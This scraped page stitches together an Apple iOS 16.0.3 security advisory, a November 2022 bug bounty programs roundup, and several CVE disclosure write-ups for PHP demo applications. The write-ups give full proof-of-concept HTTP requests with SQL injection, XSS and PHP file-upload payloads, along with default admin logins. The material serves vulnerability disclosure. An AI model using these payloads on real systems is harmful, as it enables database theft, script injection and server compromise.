An input validation issue was addressed with improved input validation. This issue is fixed in iOS 16.0.3. Processing a maliciously crafted email message may lead to a denial-of-service.

This document describes the security content of iOS 16.0.3.

**About Apple security updates**

For our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the Apple security updates page.

Apple security documents reference vulnerabilities by CVE-ID when possible.

For more information about security, see the Apple Product Security page.

**iOS 16.0.3**

Released October 10, 2022

**Mail**

Available for: iPhone 8 and later

Impact: Processing a maliciously crafted email message may lead to a denial-of-service

Description: An input validation issue was addressed with improved input validation.

CVE-2022-22658

 

Information about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. Contact the vendor for additional information.

Published Date: October 10, 2022

CVE-2022-22658: About the security content of iOS 16.0.3

New web targets for the discerning hacker

New web targets for the discerning hacker

Last month two Italian security researchers revealed they had netted more than $46,000 in bug bounties after discovering a misconfiguration vulnerability in Akamai – despite receiving nothing from Akamai itself.

The exploit, which leveraged HTTP smuggling and hop-by-hop header abuse techniques, instead achieved payouts from several of the company’s customers. These included $25,200 from PayPal and rewards from Airbnb, Hyatt Hotels, Valve, Zomato, and Goldman Sachs.

In other payout news, researcher Saajan Bhujel bagged a $10,000 bounty from GitHub after finding a way to spoof the platform’s login interface. Bypassing HTML filtering in the MathJax display engine allowed him to inject form elements and change the website’s CSS, potentially fooling users into entering credentials into a fake login page.

Apple, meanwhile, has invited researchers to apply for the Apple Security Research Device Program, with applications open until the end of November.

Successful applications will receive a Security Research Device (SRD) – a specially-fused iPhone that allows iOS security research to be carried out without having to bypass its security features. Shell access is available, and researchers can run any tools, choose their own entitlements, and customize the kernel.

Apple has also revamped its ‘Apple Security Research’ website, with researchers now able to track bug reports via real-time status updates. The program has paid out nearly $20 million in bounties since launching 2.5 years ago.

Meanwhile, the Swiss National Cyber Security Centre (NCSC) has launched a private bug bounty program that involves probing the federal government’s web applications, APIs, and critical infrastructure.

Amazon’s new hardware-focused program, managed by HackerOne, is offering rewards ranging up to $25,00 for bugs in Fire, Echo, FireTV, Halo, Luna Controller, and Kindle devices, along with corresponding applications and firmware.

And finally, the US Department of Defense said it paid out a total of $75,000 in bounties for 648 bug reports submitted by 267 researchers during a hackathon that took place in July.

**The latest bug bounty programs for November 2022**

The past month saw the arrival of several new bug bounty programs. Here’s a list of the latest entries:

**Apple Security Research Device Program**

**Program provider:  
**Independent

**Program type:  
**Private

**Max reward:  
**$1 million

**Outline:  
**Apple will send selected security researchers a Security Research Device (SRD), a specially fused iPhone that allows shell access, kernel customization, and iOS security research without the need to bypass security features.

**Notes:  
**Applications can be submitted until November 30, 2022, with successful candidates receiving an SRD for 12-month renewable periods, and reports potentially eligible for rewards through the upgraded Apple Security Bounty.

Check out the Apple SRD bug bounty page for more details

**Amazon**

**Program provider:  
**HackerOne

**Program type:  
**Public

**Max reward:  
**$25,000

**Outline:  
**Fire, Echo, FireTV, Halo, Luna Controller, and Kindle devices, along with corresponding applications and firmware, make up the 36 assets in scope under the Amazon Vulnerability Research Program.

**Notes:  
**Rewards for bugs in services and apps range up to $20,000, while bounties for devices rise higher still to $25,000.

Check out the Amazon bug bounty page for more details

**Beanstalk**

**Program provider:  
**Immunefi

**Program type:  
**Public

**Max reward:  
**$1.1 million

**Outline:  
**The bug bounty program for Beanstalk – a permissionless fiat stablecoin protocol built on Ethereum – centers on smart contracts and preventing the loss of user funds.

**Notes:  
**Beanstalk describes itself as forming “the monetary basis of an Ethereum-native, rent-free economy facilitated by the positive carry of its native fiat currency, a stablecoin called Bean”.

Check out the Beanstalk bug bounty page for more details

**BigCommerce**

**Program provider:  
**Bugcrowd

**Program type:  
**Public

**Max reward:  
**$2,500

**Outline:  
**A NASDAQ-listed provider of Software-as-a-Service (SaaS) ecommerce services to retailers.

**Notes:  
**Valid targets include bigcommerce.net, bigcommerce.com, and related iOS and Android apps.

Check out the BigCommerce bug bounty page for more details

**Blend Labs**

**Program provider:  
**HackerOne

**Program type:  
**Public

**Max reward:  
**$5,000

**Outline:  
**Blend Labs is a provider of cloud-based software for financial services firms in the US.

**Notes:  
**Just one target is in scope – knox.beta.blendlabs.com – with blend.com not a viable target.

Check out the Blend Labs bug bounty page for more details

**Deribit**

**Program provider:  
**HackerOne

**Program type:  
**Public

**Max reward:  
**$6,000

**Outline:  
**The Amsterdam-based cryptocurrency option exchange is offering between $2,500 and $6,000 for critical vulnerabilities.

**Notes:  
**Testing is only allowed within Deribit’s test environment.

Check out the Deribit bug bounty page for more details

**Jungle Smart Contract**

**Program provider:  
**HackenProof

**Program type:  
**Private

**Max reward:  
**$1 million

**Outline:  
**A peer-to-peer NFT marketplace for digital goods, art, collectibles, and other virtual assets backed by the blockchain.

**Notes:  
**Some 14 protocols are in scope.

Check out the Jungle Smart Contract bug bounty page for more details

**Lido on Polkadot and Kusama**

**Program provider:  
**Immunefi

**Program type:  
**Public

**Max reward:  
**$2 million

**Outline:  
**Lido, a liquid staking solution for Ethereum, has launched bug bounty programs focused on DOT (Polkadot) and KSM (Kusama).

**Notes:  
**Smart contract bugs could command rewards of up to $2 million, while flaws in websites and applications max out at $40,000.

Check out the Lido on Polkadot and Kusama bug bounty pages for more details

**Private Internet Access (PIA)**

**Program provider:  
**Bugcrowd

**Program type:  
**Public

**Max reward:  
**$1,250

**Outline:  
**PIA, which already had a vulnerability disclosure program, is now incentivizing researchers to probe its technologies with rewards ranging up to $1,250.

**Notes:  
**Priority bugs are those enabling remote code execution, unlicensed access to VPN servers, or third-party monitoring or leaking of user data.

Check out the PIA bug bounty page for more details

**Rec Room**

**Program provider:  
**Bugcrowd

**Program type:  
**Public

**Max reward:  
**$2,500

**Outline:  
**A video game and video game creation platform available on Windows, Xbox, PlayStation, Oculus Quest, Apple devices, and Android.

**Notes:  
**Rec Room web application and API are in scope, but the free, cross-platform Rec Room game is the “primary target”.

Check out the Rec Room bug bounty page for more details

**Redox**

**Program provider:  
**Bugcrowd

**Program type:  
**Public

**Max reward:  
**$5,000

**Outline:  
**Redox technology facilitates the transferring of electronic healthcare records between organizations.

**Notes:  
**Critical bugs ordinarily fetch rewards of between $3,000-$4500, but submissions that “reflect an understanding of the platform and can describe the vulnerability and its impact and how to resolve it clearly and concisely” could net bounties of $5,000.

Check out the Redox bug bounty page for more details

**Stravito**

**Program provider:  
**Intigriti

**Program type:  
**Public

**Max reward:  
**Undisclosed

**Outline:  
**The market research platform claims McDonalds, Electrolux, Comcast, and Carlsberg among its customers.

**Notes:  
**Said Stravito founder and CEO Thor Olof Philogène: “Partnering with Intigriti, the leaders in this space, allows us to add an additional layer of stress testing to ensure we continue delivering the most robust and secure platform in our space.”

Check out the Stravito bug bounty page for more details

**Swiss National Cybersecurity Centre**

**Program provider:  
**Bug Bounty Switzerland

**Program type:  
**Private

**Max reward:  
**Undisclosed

**Outline:  
**The Swiss National Cybersecurity Centre (NCSC) is seeking submissions for bugs in the federal government’s web applications, APIs, and critical infrastructure.

**Notes:  
**As previously reported by The Daily Swig, the program follows a pilot project conducted in 2021 where ethical hackers probed IT systems of the Swiss parliament and Federal Department of Foreign Affairs for security vulnerabilities.

Check out the Swiss NCSC bug bounty page for more details

**Other bug bounty and VDP news this month**

*   **HackerOne** is expanding numbers of its ‘Hacker Success Managers’ to assist bug hunters, and has launched a new attack surface management platform, HackerOne Assets
*   **Bugcrowd** is now a CVE numbering authority, and has also launched a program management platform to help customers coordinate pen test, bug bounty, VDP, and ASM assets
*   European platform **Intigriti** has launched Hybrid Pentesting, which purports to combine the ‘pay-for-impact’ bug bounty model with the dedicated resourcing strategy of penetration testing
*   **YesWeHack** has launched MyOpenVDP, a turnkey vulnerability disclosure program-hosting solution
*   **Open Bug Bounty** has surpassed the milestone of notching one million web security vulnerabilities (PDF) reported and patched eight years after the platform’s launch

Curated by Adam Bannister. Additional reporting by Emma Woollacott.

**PREVIOUS EDITION** Bug Bounty Radar // The latest bug bounty programs for October 2022

Bug Bounty Radar // The latest bug bounty programs for November 2022

Fast Food Ordering System v1.0 was discovered to contain a SQL injection vulnerability via the component /fastfood/purchase.php.

**Vulnerability Description**

Fast Food Ordering System v1.0 was discovered to contain a SQL injection vulnerability via the edit-admin.php. It is an open source project from campcodes.com. This vulnerability can lead to database information leakage.

1.  Vulnerability Submitter: Tr0e
    
2.  vendors: Fast Food Ordering System v1.0;
    
3.  The program is built using the xmapp/v3.3.0 and PHP/8.1.10 version;
    
4.  Vulnerability location: /fastfood/purchase.php
    

**Vulnerability Verification**

\[+\] Payload:

test'and(select\*from(select+sleep(3))a/\*\*/union/\*\*/select+1)='

POC：

POST /fastfood/purchase.php HTTP/1.1
Host: 192.168.0.111:91
Content\-Length: 259
Cache\-Control: max\-age\=0
Upgrade\-Insecure\-Requests: 1
Origin: http://192.168.0.111:91
Content\-Type: application/x\-www\-form\-urlencoded
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.0.111:91/fastfood/order.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=rbcvgagjbbad1bbrbb62nukgmc
Connection: close
quantity\_0=&quantity\_1=&quantity\_2=&quantity\_3=&quantity\_4=&quantity\_5=&quantity\_6=&quantity\_7=&quantity\_8=&quantity\_9=&quantity\_10=&quantity\_11=&productid%5B%5D=23%7C%7C12&quantity\_12=10&customer=test'and(select\*from(select+sleep(3))a/\*\*/union/\*\*/select+1)\='

**How to verify**

Build the vulnerability environment according to the steps provided by the source code author and execute the poc provided above.

The vulnerability is located at the "Order - Save" function, you shuold inserts Payload when you save order，as shown in the following figure：

CVE-2022-43081: CVE_Hunter/SQLi-3.md at main · Tr0e/CVE_Hunter

A cross-site scripting (XSS) vulnerability in /fastfood/purchase.php of Fast Food Ordering System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the customer parameter.

**Vulnerability Description**

Fast Food Ordering System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the purchase.php. It is an open source project from campcodes.com. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the customer parameter.

1.  Vulnerability Submitter: Tr0e
    
2.  vendors: Fast Food Ordering System v1.0;
    
3.  The program is built using the xmapp/v3.3.0 and PHP/8.1.10 version;
    
4.  Vulnerability location: /fastfood/purchase.php
    

**Vulnerability Verification**

\[+\] Payload:

<script\>alert("XSS")</script\>

POC：

POST /fastfood/purchase.php HTTP/1.1
Host: 192.168.0.111:91
Content\-Length: 259
Cache\-Control: max\-age\=0
Upgrade\-Insecure\-Requests: 1
Origin: http://192.168.0.111:91
Content\-Type: application/x\-www\-form\-urlencoded
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed\-exchange;v\=b3;q\=0.9
Referer: http://192.168.0.111:91/fastfood/order.php
Accept\-Encoding: gzip, deflate
Accept\-Language: zh\-CN,zh;q\=0.9,en;q\=0.8
Cookie: PHPSESSID\=rbcvgagjbbad1bbrbb62nukgmc
Connection: close

quantity\_0\=&quantity\_1\=&quantity\_2\=&quantity\_3\=&quantity\_4\=&quantity\_5\=&quantity\_6\=&quantity\_7\=&quantity\_8\=&quantity\_9\=&quantity\_10\=&quantity\_11\=&productid%5B%5D\=23%7C%7C12&quantity\_12\=10&customer\=<script\>alert("XSS")</script\>

**How to verify**

Build the vulnerability environment according to the steps provided by the source code author and execute the Payload provided above.

The vulnerability is located at the "Order - Save" function, you shuold inserts Payload when you save order，as shown in the following figure：

CVE-2022-43082: CVE_Hunter/XSS-4.md at main · Tr0e/CVE_Hunter

A cross-site scripting (XSS) vulnerability in admin-add-vehicle.php of Vehicle Booking System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the v_name parameter.

**Vulnerability Description**

Vehicle Booking System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the admin-add-vehicle.php. It is an open source project from https://codeastro.com/ . This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the v\_name parameter.

1.  Vulnerability Submitter: Tr0e
    
2.  vendors: Vehicle Booking System in PHP with Source Code - CodeAstro
    
3.  The program is built using the xmapp/v3.3.0 and PHP/8.1.10 version
    
4.  Vulnerability location: /VehicleBooking-PHP/admin/admin-add-vehicle.php
    

**Vulnerability Verification**

\[+\] Payload:

<script\>alert("XSS")</script\>

POC：

POST http://192.168.0.120:91/VehicleBooking-PHP/admin/admin-add-vehicle.php HTTP/1.1
Host: 192.168.0.120:91
Content\-Length: 905
Cache\-Control: max\-age\=0
Upgrade\-Insecure\-Requests: 1
Origin: http://192.168.0.120:91
Content\-Type: multipart/form\-data; boundary\=\--\--WebKitFormBoundaryHwRD9k9A7fnBXCiu
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed\-exchange;v\=b3;q\=0.9
Referer: http://192.168.0.120:91/VehicleBooking-PHP/admin/admin-add-vehicle.php
Accept\-Encoding: gzip, deflate
Accept\-Language: zh\-CN,zh;q\=0.9,en;q\=0.8
Cookie: PHPSESSID\=ldi7mdlvm8g7bnfhunuvrhp8ne
Connection: close

\--\--\--WebKitFormBoundaryHwRD9k9A7fnBXCiu
Content\-Disposition: form\-data; name\="v\_name"

<script\>alert("XSS")</script>
\--\--\--WebKitFormBoundaryHwRD9k9A7fnBXCiu
Content\-Disposition: form\-data; name\="v\_reg\_no"

aaa
\--\--\--WebKitFormBoundaryHwRD9k9A7fnBXCiu
Content\-Disposition: form\-data; name\="v\_pass\_no"

111
\--\--\--WebKitFormBoundaryHwRD9k9A7fnBXCiu
Content\-Disposition: form\-data; name\="v\_driver"

Demo User
\--\--\--WebKitFormBoundaryHwRD9k9A7fnBXCiu
Content\-Disposition: form\-data; name\="v\_category"

Bus
\--\--\--WebKitFormBoundaryHwRD9k9A7fnBXCiu
Content\-Disposition: form\-data; name\="v\_status"

Booked
\--\--\--WebKitFormBoundaryHwRD9k9A7fnBXCiu
Content\-Disposition: form\-data; name\="v\_dpic"; filename\="Tr0e.jpg"
Content\-Type: image/jpeg

123
\--\--\--WebKitFormBoundaryHwRD9k9A7fnBXCiu
Content\-Disposition: form\-data; name\="add\_veh"

\--\--\--WebKitFormBoundaryHwRD9k9A7fnBXCiu\--

**How to verify**

1.  Build the vulnerability environment according to the steps provided by the source code author;
2.  log in to the background management system through the default account and password（Email: admin@mail.com Password: codeastro.com）;
3.  The vulnerability lies in the "Vehicles - Add - Add Vehicle" function, you should inserts Payload when you Add Vehicle, as shown in the following figure：

CVE-2022-43084: CVE_Hunter/XSS-5.md at main · Tr0e/CVE_Hunter

An arbitrary file upload vulnerability in admin-add-vehicle.php of Vehicle Booking System v1.0 allows attackers to execute arbitrary code via a crafted PHP file.

**Vulnerability Description**

Arbitrary file upload vulnerability in Vehicle Booking System v1.0 allows attackers to execute arbitrary code via the file upload to admin-add-vehicle.php. It is an open source project from https://codeastro.com .

1.  Vulnerability Submitter: Tr0e
    
2.  vendors: Vehicle Booking System in PHP with Source Code - CodeAstro
    
3.  The program is built using the xmapp/v3.3.0 and PHP/8.1.10 version;
    
4.  Vulnerability location: /VehicleBooking-PHP/admin/admin-add-vehicle.php
    

**Vulnerability Verification**

\[+\] Payload:

POC：

POST http://192.168.0.120:91/VehicleBooking-PHP/admin/admin-add-vehicle.php HTTP/1.1
Host: 192.168.0.120:91
Content\-Length: 895
Cache\-Control: max\-age\=0
Upgrade\-Insecure\-Requests: 1
Origin: http://192.168.0.120:91
Content\-Type: multipart/form\-data; boundary\=\--\--WebKitFormBoundaryHwRD9k9A7fnBXCiu
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed\-exchange;v\=b3;q\=0.9
Referer: http://192.168.0.120:91/VehicleBooking-PHP/admin/admin-add-vehicle.php
Accept\-Encoding: gzip, deflate
Accept\-Language: zh\-CN,zh;q\=0.9,en;q\=0.8
Cookie: PHPSESSID\=ldi7mdlvm8g7bnfhunuvrhp8ne
Connection: close

\--\--\--WebKitFormBoundaryHwRD9k9A7fnBXCiu
Content\-Disposition: form\-data; name\="v\_name"

Test
\--\--\--WebKitFormBoundaryHwRD9k9A7fnBXCiu
Content\-Disposition: form\-data; name\="v\_reg\_no"

aaa
\--\--\--WebKitFormBoundaryHwRD9k9A7fnBXCiu
Content\-Disposition: form\-data; name\="v\_pass\_no"

111
\--\--\--WebKitFormBoundaryHwRD9k9A7fnBXCiu
Content\-Disposition: form\-data; name\="v\_driver"

Demo User
\--\--\--WebKitFormBoundaryHwRD9k9A7fnBXCiu
Content\-Disposition: form\-data; name\="v\_category"

Bus
\--\--\--WebKitFormBoundaryHwRD9k9A7fnBXCiu
Content\-Disposition: form\-data; name\="v\_status"

Booked
\--\--\--WebKitFormBoundaryHwRD9k9A7fnBXCiu
Content\-Disposition: form\-data; name\="v\_dpic"; filename\="Tr0e.php"
Content\-Type: image/jpeg

<?php phpinfo();?\>
\--\--\--WebKitFormBoundaryHwRD9k9A7fnBXCiu
Content\-Disposition: form\-data; name\="add\_veh"

\--\--\--WebKitFormBoundaryHwRD9k9A7fnBXCiu\--

**How to verify**

1.  Build the vulnerability environment according to the steps provided by the source code author.
2.  log in to the background management system through the default account and password（Email: admin@mail.com Password: codeastro.com）;
3.  The vulnerability lies in the "Vehicles - Add - Add Vehicle" function, you should inserts Payload when you Add Vehicle, as shown in the following figure：

CVE-2022-43083: CVE_Hunter/RCE-2.md at main · Tr0e/CVE_Hunter

An arbitrary file upload vulnerability in add_product.php of Restaurant POS System v1.0 allows attackers to execute arbitrary code via a crafted PHP file.

**Vulnerability Description**

Arbitrary file upload vulnerability in Restaurant POS System v1.0 allows attackers to execute arbitrary code via the file upload to add\_product.php. It is an open source project from https://codeastro.com .

1.  Vulnerability Submitter: Tr0e
    
2.  vendors: Restaurant POS System in PHP with Source Code - CodeAstro
    
3.  The program is built using the xmapp/v3.3.0 and PHP/8.1.10 version
    
4.  Vulnerability location: /RestaurantPOS/Restro/admin/add\_product.php
    

**Vulnerability Verification**

\[+\] Payload:

POC：

POST http://192.168.0.120:91/RestaurantPOS/Restro/admin/add\_product.php HTTP/1.1
Host: 192.168.0.120:91
Content\-Length: 826
Cache\-Control: max\-age\=0
Upgrade\-Insecure\-Requests: 1
Origin: http://192.168.0.120:91
Content\-Type: multipart/form\-data; boundary\=\--\--WebKitFormBoundarySsF9wyDdPINlRtc6
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed\-exchange;v\=b3;q\=0.9
Referer: http://192.168.0.120:91/RestaurantPOS/Restro/admin/add\_product.php
Accept\-Encoding: gzip, deflate
Accept\-Language: zh\-CN,zh;q\=0.9,en;q\=0.8
Cookie: PHPSESSID\=ldi7mdlvm8g7bnfhunuvrhp8ne
Connection: close

\--\--\--WebKitFormBoundarySsF9wyDdPINlRtc6
Content\-Disposition: form\-data; name\="prod\_name"

Test
\--\--\--WebKitFormBoundarySsF9wyDdPINlRtc6
Content\-Disposition: form\-data; name\="prod\_id"

f867c0fe4f
\--\--\--WebKitFormBoundarySsF9wyDdPINlRtc6
Content\-Disposition: form\-data; name\="prod\_code"

RFZN\-9372
\--\--\--WebKitFormBoundarySsF9wyDdPINlRtc6
Content\-Disposition: form\-data; name\="prod\_img"; filename\="Tr0e.php"
Content\-Type: image/jpeg

<?php phpinfo();?\>
\--\--\--WebKitFormBoundarySsF9wyDdPINlRtc6
Content\-Disposition: form\-data; name\="prod\_price"

100
\--\--\--WebKitFormBoundarySsF9wyDdPINlRtc6
Content\-Disposition: form\-data; name\="prod\_desc"

Tr0e Test
\--\--\--WebKitFormBoundarySsF9wyDdPINlRtc6
Content\-Disposition: form\-data; name\="addProduct"

Add Product
\--\--\--WebKitFormBoundarySsF9wyDdPINlRtc6\--

**How to verify**

1.  Build the vulnerability environment according to the steps provided by the source code author.
2.  log in to the "Admin Panel” through the default account and password（Email: admin@mail.com Password: codeastro.com）;
3.  The vulnerability lies in the "Products - Add New Product" function, you should inserts Payload when you add new product, as shown in the following figure：

CVE-2022-43085: CVE_Hunter/RCE-3.md at main · Tr0e/CVE_Hunter

Restaurant POS System v1.0 was discovered to contain a SQL injection vulnerability via update_customer.php.

**Vulnerability Description**

Restaurant POS System v1.0 was discovered to contain a SQL injection vulnerability via the update\_customer.php. It is an open source project from campcodes.com. This vulnerability can lead to database information leakage.

1.  Vulnerability Submitter: Tr0e
2.  vendors: Restaurant POS System in PHP with Source Code - CodeAstro
3.  The program is built using the xmapp/v3.3.0 and PHP/8.1.10 version;
4.  Vulnerability location: /RestaurantPOS/Restro/admin/update\_customer.php

**Vulnerability Verification**

\[+\] Payload:

test'and(select\*from(select+sleep(3))a/\*\*/union/\*\*/select+1)='

POC：

POST http://192.168.0.120:91/RestaurantPOS/Restro/admin/update\_customer.php?update=dac2ad667158'and(select\*from(select+sleep(3))a/\*\*/union/\*\*/select+1)=' HTTP/1.1
Host: 192.168.0.120:91
Content\-Length: 130
Cache\-Control: max\-age\=0
Upgrade\-Insecure\-Requests: 1
Origin: http://192.168.0.120:91
Content\-Type: application/x\-www\-form\-urlencoded
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed\-exchange;v\=b3;q\=0.9
Referer: http://192.168.0.120:91/RestaurantPOS/Restro/admin/update\_customer.php?update=dac2ad667158
Accept\-Encoding: gzip, deflate
Accept\-Language: zh\-CN,zh;q\=0.9,en;q\=0.8
Cookie: PHPSESSID\=ldi7mdlvm8g7bnfhunuvrhp8ne
Connection: close

customer\_name\=Yao&customer\_phoneno\=13011113333&customer\_email\=123%40qq.com&customer\_password\=123456&updateCustomer\=Update+Customer

**How to verify**

1.  Build the vulnerability environment according to the steps provided by the source code author ;
2.  log in to the "Admin Panel” through the default account and password（Email: admin@mail.com Password: codeastro.com）;
3.  The vulnerability is located at the "Customers - Update" function, you should inserts Payload when you Update any customer's information，as shown in the following figure：

CVE-2022-43086: CVE_Hunter/SQLi-4.md at main · Tr0e/CVE_Hunter

A cross-site scripting (XSS) vulnerability in /admin/edit-admin.php of Web-Based Student Clearance System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the txtemail parameter.

**Vulnerability Description**

Web-Based Student Clearance System in PHP Free Source Code v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the componentedit-admin.php. It is an open source project from https://www.sourcecodester.com/. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the txtemail parameter.

1.  BUG\_Author: Tr0e
    
2.  vendors: Web-Based Student Clearance System in PHP Free Source Code;
    
3.  The program is built using the xmapp/v3.3.0 and PHP/8.1.10 version;
    
4.  Vulnerability location: /student\_clearance\_system\_Aurthur\_Javis/admin/edit-admin.php
    

**Vulnerability Verification**

\[+\] Payload:

"><script>alert(1)</script>

POC：

POST http://192.168.0.111:91/student\_clearance\_system\_Aurthur\_Javis/admin/edit-admin.php?id=4 HTTP/1.1
Host: 192.168.0.111:91
Content\-Length: 486
Cache\-Control: max\-age\=0
Upgrade\-Insecure\-Requests: 1
Origin: http://192.168.0.111:91
Content\-Type: multipart/form\-data; boundary\=\--\--WebKitFormBoundaryZuvZCgQkb37Jezph
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed\-exchange;v\=b3;q\=0.9
Referer: http://192.168.0.111:91/student\_clearance\_system\_Aurthur\_Javis/admin/edit-admin.php?id=4
Accept\-Encoding: gzip, deflate
Accept\-Language: zh\-CN,zh;q\=0.9,en;q\=0.8
Cookie: PHPSESSID\=e8pdd3dv0b39d1h4vcj99q01cq
Connection: close

\--\--\--WebKitFormBoundaryZuvZCgQkb37Jezph
Content\-Disposition: form\-data; name\="txtfullname"

EKE, EMMANUEL EFA\-EVAL
\--\--\--WebKitFormBoundaryZuvZCgQkb37Jezph
Content\-Disposition: form\-data; name\="txtemail"

"><script>alert(1)</script>
\------WebKitFormBoundaryZuvZCgQkb37Jezph
Content-Disposition: form-data; name="cmddesignation"
Admin
\------WebKitFormBoundaryZuvZCgQkb37Jezph
Content-Disposition: form-data; name="btnedit"


------WebKitFormBoundaryZuvZCgQkb37Jezph--

**How to verify**

Build the vulnerability environment according to the steps provided by the source code author (Log in with the default account and password:admin/admin123) and execute the Payload provided above.

The vulnerability lies in the "User Manager - User Record - Action - Edit" function, you shuold inserts Payload when editing administrator user information，as shown in the following figure：

CVE-2022-43076: CVE_Hunter/XSS-1.md at main · Tr0e/CVE_Hunter

A cross-site scripting (XSS) vulnerability in /admin/add-fee.php of Web-Based Student Clearance System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the cmddept parameter.

**Vulnerability Description**

Web-Based Student Clearance System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the add-fee.php. It is an open source project from https://www.sourcecodester.com/. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the cmddept parameter.

1.  BUG\_Author: Tr0e
    
2.  vendors: Web-Based Student Clearance System in PHP Free Source Code;
    
3.  The program is built using the xmapp/v3.3.0 and PHP/8.1.10 version;
    
4.  Vulnerability location: /student\_clearance\_system\_Aurthur\_Javis/admin/add-fee.php
    

**Vulnerability Verification**

\[+\] Payload:

"><script>alert(1)</script>

POC：

POST http://192.168.0.111:91/student\_clearance\_system\_Aurthur\_Javis/admin/add-fee.php HTTP/1.1
Host: 192.168.0.111:91
Content\-Length: 122
Cache\-Control: max\-age\=0
Upgrade\-Insecure\-Requests: 1
Origin: http://192.168.0.111:91
Content\-Type: application/x\-www\-form\-urlencoded
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed\-exchange;v\=b3;q\=0.9
Referer: http://192.168.0.111:91/student\_clearance\_system\_Aurthur\_Javis/admin/add-fee.php
Accept\-Encoding: gzip, deflate
Accept\-Language: zh\-CN,zh;q\=0.9,en;q\=0.8
Cookie: PHPSESSID\=rbcvgagjbbad1bbrbb62nukgmc
Connection: close

cmdsession\=2020%2F2021&cmdfaculty\=Select+faculty&cmddept\=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&txtamt\=2000&btnAdd\=

**How to verify**

Build the vulnerability environment according to the steps provided by the source code author (Log in with the default account and password:admin/admin123) and execute the Payload provided above.

The vulnerability is located at the "Fee Management - Add Fee" function, you shuold inserts Payload when you add new file，as shown in the following figure：

Tag

#apple